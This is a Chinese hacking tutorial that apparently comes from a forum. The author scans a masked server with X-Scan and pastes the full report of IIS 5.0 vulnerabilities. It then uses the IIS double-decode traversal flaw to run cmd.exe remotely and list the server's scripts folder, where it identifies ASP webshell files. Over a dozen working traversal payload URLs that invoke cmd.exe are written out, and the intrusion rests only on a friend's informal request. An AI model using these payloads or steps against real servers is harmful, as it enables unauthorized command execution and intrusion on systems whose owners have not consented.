利用X-Scan找ASP木马后门

今天无聊连家都回不去呵呵~~朋友叫测试个站，打开地址一看呆拉！！可能是他故意难我吧打开地址后就这样：

[[[正在建立您想要连接的站点目前没有默认页。可能正在被进行升级。

请稍候再试此站点。假如问题仍然存在，请与 Web 站点管理员联系。 ]]]

呵呵！！

不怕有句老话不会扫描那就不是一个真正的黑客

来该X-Scan上场

****.**.**.**

扫描结果如下：

X-Scan 检测报告

------------------

检测结果

- 存活主机 : 1

- 漏洞数量 : 22

- 警告数量 : 16

- 提示数量 : 6

主机列表

****.**.**.** (发现安全漏洞)

. OS: Windows; PORT/TCP: 21, 25, 53, 80, 443

详细资料

****.**.**.** :

. 开放端口列表 :

o smtp (25/tcp) (发现安全警告)

o domain (53/tcp) (发现安全提示)

o www (80/tcp) (发现安全漏洞)

o https (443/tcp) (发现安全提示)

o ftp(21/tcp) (发现安全提示)

. 端口"smtp (25/tcp)"发现安全警告 :

SMTP服务器不支持用户身份验证，允许匿名用户使用

. 端口"smtp (25/tcp)"发现安全提示 :

A SMTP serveris running on this port

Here is its banner :

220 altsyz-web MicrosoftESMTP MAIL Service, Version: 5.0.2195.2966 ready at

Wed, 20 Oct 2004 06:28:38 +0800

NESSUS_ID : 10330

. 端口"domain (53/tcp)"发现安全提示 :

Maybe the "domain" service running on this port.

NESSUS_ID : 10330

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+di

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

http://****.**.**.**/scripts/..%u00255c..%u00255c..%u00255c..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

. 端口"www (80/tcp)"发现安全漏洞 :

The remote Microsoft Frontpageserver seems vulnerable to a remote

buffer overflow. Exploitation of this bug could give an unauthorized

user accessto the machine.

The following systems are known to be vulnerable:

Microsoft Windows 2000Service Pack 2, Service Pack 3

Microsoft Windows XP, Microsoft Windows XP Service Pack 1

Microsoft OfficeXP, Microsoft Office XP Service Release 1

Solution: Install relevant service pack or hotfix from URL below.

See als

http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx

Risk factor : High

CVE_ID : CAN-2003-0822, CAN-2003-0824

NESSUS_ID : 11923

Other references : IAVA:2003-A-0033

. 端口"www (80/tcp)"发现安全漏洞 :

There's a buffer overflow in the remote web server through

the ISAPI filter.

It is possible to overflow the remote web server and execute

commands as user SYSTEM.

Solution: See

http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx

Risk factor : High

CVE_ID : CVE-2001-0544, CVE-2001-0545, CVE-2001-0506, CVE-2001-0507,

CVE-2001-0508, CVE-2001-0500

BUGTRAQ_ID : 2690, 3190, 3194, 3195

NESSUS_ID : 10685

. 端口"www (80/tcp)"发现安全漏洞 :

The IIS server appears to have the .HTR ISAPI filter mapped.

At least one remote vulnerability has been discovered for the .HTR

filter. This is detailed in Microsoft Advisory

MS02-018, and gives remote SYSTEM level access to the web server.

It is recommended that, even if you have patched this vulnerability,

you unmap the .HTR extension and any other unused ISAPI extensions

if they are not required for the operation of your site.

Solution :

To unmap the .HTR extension:

1.Open InternetServices Manager.

2.Right-click the Web server choose Properties from the context menu.

3.Master Properties

4.Select WWW Service -> Edit -> HomeDirectory -> Configuration

and remove the reference to .htr from the list.

In addition, you may wish to download and install URLSCAN from the

Microsoft Technet Website. URLSCAN, by default, blocks all requests

for .htr files.

Risk factor : High

CVE_ID : CVE-2002-0071

BUGTRAQ_ID : 4474

NESSUS_ID : 10932

Other references : IAVA:2002-A-0002

. 端口"www (80/tcp)"发现安全漏洞 :

The remote server is vulnerable to a buffer overflow in the .HTR

filter.

An attacker may use this flaw to execute arbitrary code on

this host (although the exploitation of this flaw is considered

as being difficult).

Solution:

To unmap the .HTR extension:

1.Open Internet Services Manager.

2.Right-click the Web server choose Properties from the context menu.

3.Master Properties

4.Select WWW Service -> Edit -> HomeDirectory -> Configuration

and remove the reference to .htr from the list.

See MS bulletin MS02-028 for a patch

Risk factor : High

CVE_ID : CVE-2002-0364, CVE-2002-0071

BUGTRAQ_ID : 4855

NESSUS_ID : 11028

Other references : IAVA:2002-A-0002

. 端口"www (80/tcp)"发现安全漏洞 :

The remote WebDAV server may be vulnerable to a buffer overflow when

it receives a too long request.

An attacker may use this flaw to execute arbitrary code within the

LocalSystem security context.

*** As safe checks are enabled, Nessus did not actually test for this

*** flaw, so this might be a false positive

Solution : See

http://www.microsoft.com/technet/security/bulletin/ms03-007.mspx

Risk Factor : High

CVE_ID : CAN-2003-0109

BUGTRAQ_ID : 7116

NESSUS_ID : 11412

Other references : IAVA:2003-A-0005

. 端口"www (80/tcp)"发现安全漏洞 :

When IIS receives a user request to run a script, it renders

the request in a decoded canonical form, then performs

security checks on the decoded request. A vulnerability

results because a second, superfluous decoding pass is

performed after the initial security checks are completed.

Thus, a specially crafted request could allow an attacker to

execute arbitrary commands on the IIS Server.

Solution: See MS advisory MS01-026(Superseded by ms01-044)

See http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx

Risk factor : High

CVE_ID : CVE-2001-0507, CVE-2001-0333

BUGTRAQ_ID : 2708

NESSUS_ID : 10671

. 端口"www (80/tcp)"发现安全漏洞 :

There's a buffer overflow in the remote web server through

the ASPISAPI filter.

It is possible to overflow the remote web server and execute

commands as user SYSTEM.

Solution: See

http://www.microsoft.com/technet/security/bulletin/ms02-018.mspx

Risk factor : High

CVE_ID : CVE-2002-0079, CVE-2002-0147, CVE-2002-0149

BUGTRAQ_ID : 4485

NESSUS_ID : 10935

Other references : IAVA:2002-A-0002

. 端口"www (80/tcp)"发现安全警告 :

. 端口"www (80/tcp)"发现安全提示 :

A web server is running on this port

NESSUS_ID : 10330

. 端口"www (80/tcp)"发现安全提示 :

The remote web server type is :

Microsoft-IIS/5.0

Solution : You can use urlscan to change reported server for IIS.

NESSUS_ID : 10107

. 端口"https (443/tcp)"发现安全提示 :

Maybe the "https" service running on this port.

NESSUS_ID : 10330

. 端口"ftp (21/tcp)"发现安全提示 :

Maybe the "ftp" service running on this port.

NESSUS_ID : 10330》》》》》》》

结果发现IIS解码漏洞

那怎么利用呢高手就不用问拉

莱鸟继续》》》

发现没http://***.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

这里要申明的是我讲的是找ASP木马后门

不做其它入侵

接下来我们打开它发现什么拉..................哈哈

Directory of d:\inetpub\scripts

2004-10-20 11:18

2004-10-20 11:18 

2004-10-20 10:34 1,169 admin_nighter.asp

2004-10-20 10:48 29,451 nighterasp1.5.asp

2000-02-09 22:39 15,760 NSIISLOG.DLL

2004-10-20 10:33 3,224 sniao.asp

2004-10-20 09:30 23,109 start.asp

2004-10-20 11:18 49,627 sx.asp

到这里应该明白是怎么回事情了吧

路径d:\inetpub

文件路径\scripts\

admin_nighter.asp

这就是木马